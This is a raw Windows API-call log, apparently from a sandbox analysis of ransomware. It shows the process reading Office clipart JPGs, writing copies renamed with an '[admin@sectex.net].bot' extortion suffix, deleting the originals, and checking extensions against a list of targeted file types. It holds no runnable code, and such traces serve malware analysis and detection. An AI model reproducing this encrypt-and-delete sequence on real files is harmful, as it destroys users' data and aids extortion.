	[0170.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.621] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.621] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0170.621] GetLastError () returned 0x0
	[0170.621] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x67a3, lpOverlapped=0x0) returned 1
	[0170.737] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x67b0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x67b0, lpOverlapped=0x0) returned 1
	[0170.739] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.739] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.739] SetEndOfFile (hFile=0x3c4) returned 1
	[0170.989] CloseHandle (hObject=0x3c4) returned 1
	[0170.989] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.989] SetEndOfFile (hFile=0x388) returned 1
	[0170.991] CloseHandle (hObject=0x388) returned 1
	[0170.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg")) returned 1
	[0170.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.997] lstrlenW (lpString=".doc") returned 4
	[0170.997] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.997] lstrlenW (lpString=".docx") returned 5
	[0170.997] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0170.997] lstrlenW (lpString=".pdf") returned 4
	[0170.997] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.997] lstrlenW (lpString=".xls") returned 4
	[0170.997] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.998] lstrlenW (lpString=".xlsx") returned 5
	[0170.998] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0170.998] lstrlenW (lpString=".ppt") returned 4
	[0170.998] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.998] lstrlenW (lpString=".zip") returned 4
	[0170.998] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.998] lstrlenW (lpString=".rar") returned 4
	[0170.998] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.998] lstrlenW (lpString=".bz2") returned 4
	[0170.998] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.998] lstrlenW (lpString=".7z") returned 3
	[0170.998] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.998] lstrlenW (lpString=".dbf") returned 4
	[0170.998] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.998] lstrlenW (lpString=".1cd") returned 4
	[0170.998] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.998] lstrlenW (lpString=".jpg") returned 4
	[0170.998] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.998] lstrlenW (lpString=".doc") returned 4
	[0170.998] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.998] lstrlenW (lpString=".docx") returned 5
	[0170.998] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0170.998] lstrlenW (lpString=".pdf") returned 4
	[0170.998] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.998] lstrlenW (lpString=".xls") returned 4
	[0170.998] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.998] lstrlenW (lpString=".xlsx") returned 5
	[0170.998] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0170.998] lstrlenW (lpString=".ppt") returned 4
	[0170.999] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.999] lstrlenW (lpString=".zip") returned 4
	[0170.999] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.999] lstrlenW (lpString=".rar") returned 4
	[0170.999] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.999] lstrlenW (lpString=".bz2") returned 4
	[0170.999] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.999] lstrlenW (lpString=".7z") returned 3
	[0170.999] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.999] lstrlenW (lpString=".dbf") returned 4
	[0170.999] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.999] lstrlenW (lpString=".1cd") returned 4
	[0170.999] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 63
	[0170.999] lstrlenW (lpString=".jpg") returned 4
	[0170.999] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.999] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.999] lstrlenW (lpString="J0178932.JPG") returned 12
	[0170.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.007] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=35340) returned 1
	[0171.007] CloseHandle (hObject=0x17c) returned 1
	[0171.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg")) returned 0x20
	[0171.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.016] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.016] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0171.019] GetLastError () returned 0x0
	[0171.019] ReadFile (in: hFile=0x17c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x8a0c, lpOverlapped=0x0) returned 1
	[0171.025] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x8a10, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x8a10, lpOverlapped=0x0) returned 1
	[0171.026] ReadFile (in: hFile=0x17c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.026] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.026] SetEndOfFile (hFile=0x3f0) returned 1
	[0171.027] CloseHandle (hObject=0x3f0) returned 1
	[0171.027] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.027] SetEndOfFile (hFile=0x17c) returned 1
	[0171.029] CloseHandle (hObject=0x17c) returned 1
	[0171.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.029] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg")) returned 1
	[0171.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.030] lstrlenW (lpString=".doc") returned 4
	[0171.030] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.030] lstrlenW (lpString=".docx") returned 5
	[0171.030] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0171.030] lstrlenW (lpString=".pdf") returned 4
	[0171.030] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.031] lstrlenW (lpString=".xls") returned 4
	[0171.031] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.031] lstrlenW (lpString=".xlsx") returned 5
	[0171.031] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0171.031] lstrlenW (lpString=".ppt") returned 4
	[0171.031] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.031] lstrlenW (lpString=".zip") returned 4
	[0171.031] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.031] lstrlenW (lpString=".rar") returned 4
	[0171.031] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.031] lstrlenW (lpString=".bz2") returned 4
	[0171.031] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.031] lstrlenW (lpString=".7z") returned 3
	[0171.031] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.031] lstrlenW (lpString=".dbf") returned 4
	[0171.031] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.031] lstrlenW (lpString=".1cd") returned 4
	[0171.031] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.031] lstrlenW (lpString=".jpg") returned 4
	[0171.031] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.031] lstrlenW (lpString=".doc") returned 4
	[0171.031] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.031] lstrlenW (lpString=".docx") returned 5
	[0171.031] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0171.031] lstrlenW (lpString=".pdf") returned 4
	[0171.031] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.031] lstrlenW (lpString=".xls") returned 4
	[0171.032] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.032] lstrlenW (lpString=".xlsx") returned 5
	[0171.032] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0171.032] lstrlenW (lpString=".ppt") returned 4
	[0171.032] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.032] lstrlenW (lpString=".zip") returned 4
	[0171.032] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.032] lstrlenW (lpString=".rar") returned 4
	[0171.032] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.032] lstrlenW (lpString=".bz2") returned 4
	[0171.032] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.032] lstrlenW (lpString=".7z") returned 3
	[0171.032] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.032] lstrlenW (lpString=".dbf") returned 4
	[0171.032] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.032] lstrlenW (lpString=".1cd") returned 4
	[0171.032] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 63
	[0171.032] lstrlenW (lpString=".jpg") returned 4
	[0171.032] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.032] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0171.032] lstrlenW (lpString="J0179963.JPG") returned 12
	[0171.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.033] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=32110) returned 1
	[0171.033] CloseHandle (hObject=0x17c) returned 1
	[0171.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg")) returned 0x20
	[0171.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.034] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.034] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0171.034] GetLastError () returned 0x0
	[0171.034] ReadFile (in: hFile=0x17c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7d6e, lpOverlapped=0x0) returned 1
	[0171.039] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7d70, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7d70, lpOverlapped=0x0) returned 1
	[0171.040] ReadFile (in: hFile=0x17c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.040] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.040] SetEndOfFile (hFile=0x3f0) returned 1
	[0171.040] CloseHandle (hObject=0x3f0) returned 1
	[0171.040] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.040] SetEndOfFile (hFile=0x17c) returned 1
	[0171.043] CloseHandle (hObject=0x17c) returned 1
	[0171.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg")) returned 1
	[0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.044] lstrlenW (lpString=".doc") returned 4
	[0171.044] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.044] lstrlenW (lpString=".docx") returned 5
	[0171.044] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0171.044] lstrlenW (lpString=".pdf") returned 4
	[0171.044] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.044] lstrlenW (lpString=".xls") returned 4
	[0171.044] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.044] lstrlenW (lpString=".xlsx") returned 5
	[0171.044] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0171.044] lstrlenW (lpString=".ppt") returned 4
	[0171.044] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.044] lstrlenW (lpString=".zip") returned 4
	[0171.044] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.044] lstrlenW (lpString=".rar") returned 4
	[0171.044] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.044] lstrlenW (lpString=".bz2") returned 4
	[0171.044] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.044] lstrlenW (lpString=".7z") returned 3
	[0171.044] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.044] lstrlenW (lpString=".dbf") returned 4
	[0171.044] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.044] lstrlenW (lpString=".1cd") returned 4
	[0171.044] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.045] lstrlenW (lpString=".jpg") returned 4
	[0171.045] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.045] lstrlenW (lpString=".doc") returned 4
	[0171.045] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.045] lstrlenW (lpString=".docx") returned 5
	[0171.045] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0171.045] lstrlenW (lpString=".pdf") returned 4
	[0171.045] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.045] lstrlenW (lpString=".xls") returned 4
	[0171.045] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.045] lstrlenW (lpString=".xlsx") returned 5
	[0171.045] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0171.045] lstrlenW (lpString=".ppt") returned 4
	[0171.045] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.045] lstrlenW (lpString=".zip") returned 4
	[0171.045] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.045] lstrlenW (lpString=".rar") returned 4
	[0171.045] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.045] lstrlenW (lpString=".bz2") returned 4
	[0171.045] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.045] lstrlenW (lpString=".7z") returned 3
	[0171.045] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.045] lstrlenW (lpString=".dbf") returned 4
	[0171.045] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.045] lstrlenW (lpString=".1cd") returned 4
	[0171.045] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 63
	[0171.045] lstrlenW (lpString=".jpg") returned 4
	[0171.046] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.046] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0171.046] lstrlenW (lpString="J0182689.JPG") returned 12
	[0171.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.054] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=16615) returned 1
	[0171.054] CloseHandle (hObject=0x388) returned 1
	[0171.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg")) returned 0x20
	[0171.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
